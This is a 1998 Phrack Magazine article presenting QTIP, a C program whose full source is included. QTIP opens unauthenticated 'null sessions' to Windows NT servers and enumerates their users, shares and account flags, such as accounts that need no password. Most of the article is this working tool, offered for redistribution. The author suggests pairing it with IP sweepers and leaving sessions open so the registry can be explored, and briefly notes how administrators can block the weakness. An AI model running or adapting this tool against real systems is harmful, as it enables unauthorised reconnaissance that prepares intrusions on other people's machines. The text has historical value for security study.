| ---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 10 of 20 |
|
|
|
|
| -------------------------[ a Quick nT Interrogation Probe (QTIP) |
|
|
|
|
| --------[ twitch <twitch@aye.net> |
|
|
|
|
| ----[ INTRODUCTION |
|
|
|
|
| As you probably already know, certain LanMan derivatives (most notably |
| Windows NT) sport a stupid feature known as `null sessions`. Null sessions |
| allow server connections to be established without the hassle and rigmarole of |
| username or password authentication. This is reportedly to ease |
| administrative tasks (UserManager and ilk utilize them). Also, such silliness |
| such as the RedButton bug have shown (although in poor form) that an |
| interested/malicious third party can gleen quite a bit of info from `Press any |
| key to return to index`. Once established, these connections default to having |
| permissions to display enumerated user and share lists, get information about |
| particular users, wander the registry, etc. QTIP takes advantage of this, |
| allowing the user to procure far too much information about the target |
| machine. It employs no black magic or hidden technique to do this. QTIP |
| works via straight API calls. |
|
|
| As of service pack 3 for NT 4.0, it is possible for the `informed` system |
| administrator to block null sessions through the registry, effectively |
| nullifying any threat from QTIP. I do not, however, believe that there is |
| such a patch for 3.5.1 machines. Also, it has not been tested against SAMBA |
| servers, and as far as the author knows, SAMBA does not support something as |
| asinine as null sessions (anyone who knows any differently is invited to mail |
| corrections to the author, or directly to Phrack Magazine). |
|
|
| To prevent these sorts of shenanigans from happening remotely across the |
| Internet, the concerned system administrator can block NBT traffic at the |
| gateway (this sort of traffic should not be allowed to/from the Internet as |
| standard fare). If you are running NT 4.0, install the service packs, and set |
| the appropriate registry values to disable the attack. Or use OpenBSD. |
|
|
|
|
| ----[ THE CODE |
|
|
|
|
| QTIP has a few options. qtip -h supplies the following info: |
|
|
| usage qtip[asug<username>hv] <target> |
| -s: get share list |
| -u: get user list |
| -g <username>: get infos about <username> |
| -d: leave connection established on exit |
| -a: -s + -u |
| -h, -?: display this help |
| -v: be verbose (use twice to be garrulous) |
|
|
| Seems rather self explanatory. If the verbose flag is set, then -u |
| implies a recursive -g. -d is handy if you plan to take a look at the |
| registry as well (there's gold in them thar hills). Omission of all flags just |
| establishes a null session and exits. <target> can be a fully-qualified |
| domain name, ip address, or UNC format. The code compiles like a dream under |
| visual c 4.1. There is no makefile included, just link the code against |
| kernel32.lib, libc.lib and wsock32.lib. This program is most useful wrapped |
| in scripts with something like tping(ip sweeper), and maybe a few registry |
| inquisition perl scripts. Feel free to redistribute, just give props where |
| props are due, and please let me know if you make any interesting changes. |
|
|
| <++> qtip/qtip.h |
| /* |
| * qtip.h |
| * 12/04/1997 |
| * twitch |
| * twitch@aye.net |
| * |
| * a quick nt investigative probe. (mis)uses null sessions to collect |
| * sundry information about a WindowsNT server. distribute as you |
| * please. be alert, look alive, and act like you kow. |
| * |
| * '...i should dismiss him, in order to teach him that pleasure consists |
| * not in what i enjoy, but in having my own way.' |
| * -sk, either/or |
| */ |
|
|
| #include <stdio.h> |
| #include <windows.h> |
| #include <winsock.h> |
| #include "lm.h" |
|
|
| #define k16 16384 |
| #define TARG_LEN 255 |
| #define USER_LEN 22 |
|
|
| void handle_error(DWORD); |
| void prepend_str(char *, char*); |
| int open_session(); |
| int procure_userlist(); |
| int procure_sharelist(); |
| void parse_cl(int, char **); |
| void usage(char *); |
| int powerup(int, char **); |
| void bail(const char *); |
| int close_session(); |
| void get_usr_info(wchar_t *); |
|
|
| /* couple o globals to make my life easier */ |
| u_int OPT_SHARES, OPT_USERS, OPT_GETUI; |
| u_int OPT_NODEL, VERB; |
| char target[TARG_LEN]; |
| WCHAR utarg[TARG_LEN]; |
| WCHAR user[USER_LEN]; |
| NETRESOURCE nr; |
|
|
| <--> |
| <++> qtip/qtip.c |
|
|
| /* |
| * qtip.c |
| * 10/04/1997 |
| * twitch |
| * twitch@aye.net |
| * |
| * a quick nt investigative probe |
| * link against kernel32.lib, libc.lib and wsock32.lib. |
| * qtip -h for usage. distribute as you please. |
| * |
| */ |
|
|
| #include "qtip.h" |
|
|
| int main(int argc, char *argv[]) |
| { |
| if( (powerup(argc, argv)) ) |
| return(1); |
|
|
| if( (open_session()) != 0) |
| return(1); |
|
|
| if(OPT_SHARES) |
| procure_sharelist(); |
|
|
| if(OPT_USERS) |
| procure_userlist(); |
|
|
| if(OPT_GETUI) |
| get_usr_info(utarg); |
|
|
| close_session(); |
| return(0); |
| } |
|
|
| int open_session() |
| { |
| DWORD r; |
|
|
| nr.dwType = RESOURCETYPE_ANY; |
| nr.lpLocalName = NULL; |
| nr.lpProvider = NULL; |
| nr.lpRemoteName = target; |
|
|
| if(VERB) |
| printf("establishing null session with %s...\n", target); |
|
|
| r = WNetAddConnection2(&nr, "", "", 0); |
| if(r != NO_ERROR){ |
| handle_error(r); |
| return -1; |
| } |
|
|
| if(VERB) |
| printf("connection established\n"); |
|
|
| return 0; |
| } |
|
|
| /* |
| * procure_userlist() |
| * just use the old lm NetUserEnum() because there isnt comparable |
| * functionality in the WNet sect. i just wish the win32 api was |
| * more bloated and obtuse. |
| */ |
| int procure_userlist() |
| { |
| NET_API_STATUS nas; |
| LPBYTE *buf = NULL; |
| DWORD entread, totent, rhand; |
| DWORD maxlen = 0xffffffff; |
| USER_INFO_0 *usrs; |
| unsigned int i; |
| int cc = 0; |
|
|
| entread = totent = rhand = nas = 0; |
| if( (buf = (LPBYTE*)malloc(k16)) == NULL) |
| bail("malloc probs\n"); |
|
|
| if(VERB) |
| wprintf(L"\ngetting userlist from %s...\n", utarg); |
|
|
| nas = NetUserEnum(utarg, 0, 0, buf, maxlen, &entread, &totent, &rhand); |
| if(nas != NERR_Success){ |
| fprintf(stderr, "couldnt enum users, "); |
| handle_error(nas); |
| goto cleanup; |
| } |
|
|
| cc = sizeof(USER_INFO_0) * entread; |
| if( (usrs = (USER_INFO_0 *)malloc(cc)) == NULL){ |
| fprintf(stderr, "malloc probs\n"); |
| goto cleanup; |
| } |
|
|
| memcpy(usrs, *buf, cc); |
| for(i = 0; i < entread; i++){ |
| wcscpy(user, usrs[i].usri0_name); |
| wprintf(L"%s\n", user); |
| if(VERB) |
| get_usr_info(utarg); |
| } |
|
|
| cleanup: |
| if(buf) |
| free(buf); |
|
|
| return 0; |
| } |
|
|
| /* |
| * get_user_info() |
| * attempt to gather some interesting facts about |
| * a user |
| */ |
| void get_usr_info(LPWSTR utarg) |
| { |
| NET_API_STATUS nas; |
| USER_INFO_1 usrinfos; |
| LPBYTE *buf = NULL; |
|
|
| if( !(buf = (LPBYTE *)malloc(sizeof(USER_INFO_1))) ) |
| bail("malloc probs\n"); |
|
|
| nas = NetUserGetInfo(utarg, user, 1, buf); |
|
|
| if(nas){ |
| fwprintf(stderr, L"couldnt get user info for for %s, ", user); |
| handle_error(nas); |
| } |
| else{ |
| memcpy(&usrinfos, *buf, sizeof(USER_INFO_1)); |
|
|
| /* most of these will never happen, but nothings lost trying */ |
| if( (UF_PASSWD_NOTREQD & usrinfos.usri1_flags) ) |
| printf("\t-password not required, how about that.\n"); |
| if( (UF_ACCOUNTDISABLE & usrinfos.usri1_flags) ) |
| printf("\t-account disabled\n"); |
| if( (UF_LOCKOUT & usrinfos.usri1_flags) ) |
| printf("\t-account locked out\n"); |
| if( (UF_DONT_EXPIRE_PASSWD & usrinfos.usri1_flags) ) |
| printf("\t-password doesnt expire\n"); |
| if( (UF_PASSWD_CANT_CHANGE & usrinfos.usri1_flags) ) |
| printf("\t-user cant change password\n"); |
| if( (UF_WORKSTATION_TRUST_ACCOUNT & usrinfos.usri1_flags) ) |
| printf("\t-account for some other box in this domain\n"); |
| if( (UF_SERVER_TRUST_ACCOUNT & usrinfos.usri1_flags) ) |
| printf("\t-account for what is prolly the BDC\n"); |
| if( (UF_INTERDOMAIN_TRUST_ACCOUNT & usrinfos.usri1_flags) ) |
| printf("\t-interdomain permit to trust account\n"); |
| } |
|
|
| free(buf); |
| } |
|
|
| /* |
| * procure_sharelist() |
| * strangely enough, this retrieves a sharelist from target |
| */ |
| int procure_sharelist() |
| { |
| DWORD r; |
| DWORD bufsize = 16384, cnt = 0xFFFFFFFF; |
| HANDLE enhan; |
| void *buf; |
| NETRESOURCE *res; |
| u_int i; |
|
|
| if( (buf = malloc(bufsize)) == NULL){ |
| fprintf(stderr, "malloc probs, bailing\n"); |
| return -1; |
| } |
|
|
| nr.dwScope = RESOURCE_CONNECTED; |
| nr.dwType = RESOURCETYPE_ANY; |
| nr.dwDisplayType = 0; |
| nr.dwUsage = RESOURCEUSAGE_CONTAINER; |
| nr.lpLocalName = NULL; |
| nr.lpRemoteName = (LPTSTR)target; |
| nr.lpComment = NULL; |
| nr.lpProvider = NULL; |
|
|
| r = WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_ANY, |
| RESOURCEUSAGE_CONNECTABLE, &nr |
| , &enhan); |
| if(r != 0){ |
| free(buf); |
| printf("open_enum failed, sorry- "); |
| handle_error(r); |
| return -1; |
| } |
|
|
| r = WNetEnumResource(enhan, &cnt, buf, &bufsize); |
| if(r != 0){ |
| free(buf); |
| printf("enum_res failed- "); |
| handle_error(r); |
| return -1; |
| } |
|
|
| res = (NETRESOURCE*)malloc(cnt * sizeof(NETRESOURCE)); |
| if(res == NULL){ |
| free(buf); |
| printf("malloc probs, i wont be listing shares.\n"); |
| return -1; |
| } |
| memcpy(res, buf, (cnt * sizeof(NETRESOURCE)) ); |
|
|
| for(i = 0; i < cnt; i++){ |
| if(VERB) |
| printf("\nshare name:\t"); |
|
|
| printf("%s\n", res[i].lpRemoteName); |
| if(VERB){ |
| printf("share type:\t"); |
| if(res[i].dwType = RESOURCETYPE_DISK) |
| printf("disk"); |
| else |
| printf("printer"); |
| printf("\ncomment:\t%s\n", res[i].lpComment); |
| } |
| } |
|
|
| free(buf); |
| free(res); |
| return 0; |
| } |
|
|
| /* |
| * close_session() |
| * clean up our mess |
| */ |
| int close_session() |
| { |
| DWORD r; |
|
|
| WSACleanup(); |
| if(!OPT_NODEL) |
| r = WNetCancelConnection2(target, 0, TRUE); |
|
|
| if(r != 0){ |
| fprintf(stderr, "couldnt delete %s, returned %d\n", target, r); |
| return -1; |
| } |
| else{ |
| if(VERB) |
| printf("connection to %s deleted\n", target); |
| } |
|
|
| return 0; |
| } |
|
|
| /* |
| * handle_error() |
| * util function to deal with some errors. |
| */ |
| void handle_error(DWORD err) |
| { |
| switch(err){ |
| case ERROR_ACCESS_DENIED: |
| fprintf(stderr, "access is denied.\n"); |
| break; |
| case ERROR_BAD_NET_NAME: |
| fprintf(stderr, "bad net name.\n"); |
| break; |
| case ERROR_EXTENDED_ERROR: |
| fprintf(stderr, "an extended error occurred.\n"); |
| break; |
| case ERROR_INVALID_PASSWORD: |
| fprintf(stderr, "invalid password.\n"); |
| break; |
| case ERROR_LOGON_FAILURE: |
| fprintf(stderr, "bad username or password.\n"); |
| break; |
| case NO_ERROR: |
| fprintf(stderr, "it worked\n"); |
| break; |
| case ERROR_BAD_NETPATH: |
| fprintf(stderr, "network path not found.\n"); |
| break; |
| default: |
| fprintf(stderr, "a random error occurred (%d).\n", err); |
| } |
| } |
|
|
| /* |
| * prepend_str() |
| * util funk to prepend chars to a string |
| */ |
| void prepend_str(char *orgstr, char *addthis) |
| { |
| orgstr = _strrev(orgstr); |
| addthis = _strrev(addthis); |
| strcat(orgstr, addthis); |
| orgstr = _strrev(orgstr); |
| } |
| /* |
| * parse_cl() |
| * try and make sense of the command line. no, i dont have a win32 getopt. |
| * yes, i know i should |
| */ |
| void parse_cl(int argc, char **argv) |
| { |
| int i, cc; |
| char opt; |
| DWORD r; |
|
|
| OPT_SHARES = OPT_USERS = VERB = 0; |
|
|
| for(i = 1; i < (argc); i++){ |
| if( (*argv[i]) == '-'){ |
| opt = *(argv[i]+1); |
| switch(opt){ |
| case 'a': |
| OPT_SHARES = 1; |
| OPT_USERS = 1; |
| break; |
| case 's': |
| OPT_SHARES = 1; |
| break; |
| case 'u': |
| OPT_USERS = 1; |
| break; |
| case 'g': |
| OPT_GETUI = 1; |
| if( (strlen(argv[i+1])) > USER_LEN) |
| bail("username too long (must be < 21)"); |
| ZeroMemory(user, USER_LEN); |
| cc = strlen(argv[++i]); |
| r = MultiByteToWideChar(CP_ACP, 0, argv[i], cc, user, (cc + 2)); |
| break; |
| case 'd': |
| OPT_NODEL = 1; |
| break; |
| case 'v': |
| VERB++; |
| break; |
| default: |
| if( (opt != 'h') && (opt != '?') ) |
| fprintf(stderr, "unknown option '%c'\n", opt); |
| usage(argv[0]); |
| break; |
| } |
| } |
| } |
|
|
| if( (OPT_SHARES) && (VERB) ) |
| printf("listing shares\n"); |
| if( (OPT_USERS) && (VERB) ) |
| printf("listing users\n"); |
| if( (OPT_GETUI) && (VERB) ) |
| wprintf(L"getting infos about user %s\n", user); |
| if(VERB) |
| printf("verbosity = %d\n", VERB); |
| } |
|
|
| /* |
| * powerup() |
| * just init stuff and parse the command line |
| */ |
| int powerup(int argc, char **argv) |
| { |
| struct hostent *hent; |
| u_long addie; |
| WORD werd; |
| WSADATA data; |
| char buf[256]; |
| int cc = 0, ucc = 0; |
|
|
| if(argc < 3) |
| usage(argv[0]); |
|
|
| parse_cl(argc, argv); |
| ZeroMemory(buf, 256); |
| strcpy(buf, argv[argc - 1]); |
|
|
| /* if not unc format get the ip */ |
| if(buf[0] != '\\'){ |
| if(VERB > 1) |
| printf("target not in unc\n"); |
|
|
| werd = MAKEWORD(1, 1); |
| if( (WSAStartup(werd, &data)) !=0 ) |
| bail("couldnt init winsock\n"); |
|
|
| hent = (struct hostent *)malloc(sizeof(struct hostent)); |
| if(hent == NULL) |
| bail("malloc probs\n"); |
|
|
| if( (addie = inet_addr(buf)) == INADDR_NONE){ |
| hent = gethostbyname(buf); |
| if(hent == NULL){ |
| fprintf(stderr, "fatal: couldnt resolve %s.\n", buf); |
| return -1; |
| } |
| ZeroMemory(buf, 256); |
| strcpy(buf, inet_ntoa(*(struct in_addr *)*hent->h_addr_list)); |
| } |
| prepend_str(buf, "\\\\"); |
| } |
| else |
| fprintf(stderr, "target already in unc\n"); |
|
|
| if( (strlen(buf) > (TARG_LEN - 1)) ){ |
| free(buf); |
| bail("hostname too long (must be < 255 chars.)"); |
| return -1; |
| } |
|
|
| ZeroMemory(target, TARG_LEN); |
| strcpy(target, buf); |
|
|
| ZeroMemory(utarg, TARG_LEN); |
| cc = strlen(target); |
| ucc = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, target, cc, utarg, cc); |
| if(ucc < 1){ |
| bail("unicode conversion probs, sorry"); |
| return -1; |
| } |
|
|
| return 0; |
| } |
|
|
| void usage(char *prog) |
| { |
| fprintf(stderr, "usage: %s [asug<username>hv] <target>\n", prog); |
| fprintf(stderr, "\t-s:\t\tget share list\n"); |
| fprintf(stderr, "\t-u:\t\tget user list\n"); |
| fprintf(stderr, "\t-g: <username>\tget infos about just <username>\n"); |
| fprintf(stderr, "\t-d:\t\tleave connection established on exit\n"); |
| fprintf(stderr, "\t-a:\t\t-s + -u\n"); |
| fprintf(stderr, "\t-h, -?:\t\tdisplay this help\n"); |
| fprintf(stderr, "\t-v:\t\tbe verbose (use twice to be garrolous)\n"); |
| exit(0); |
| } |
|
|
| /* |
| * bail() |
| * just whine and die |
| */ |
| void bail(const char *msg) |
| { |
| fprintf(stderr, "fatal: %s\n", msg); |
| close_session(); |
| exit(1); |
| } |
| <--> |
|
|
|
|
| ----[ EOF |
|
|
|
|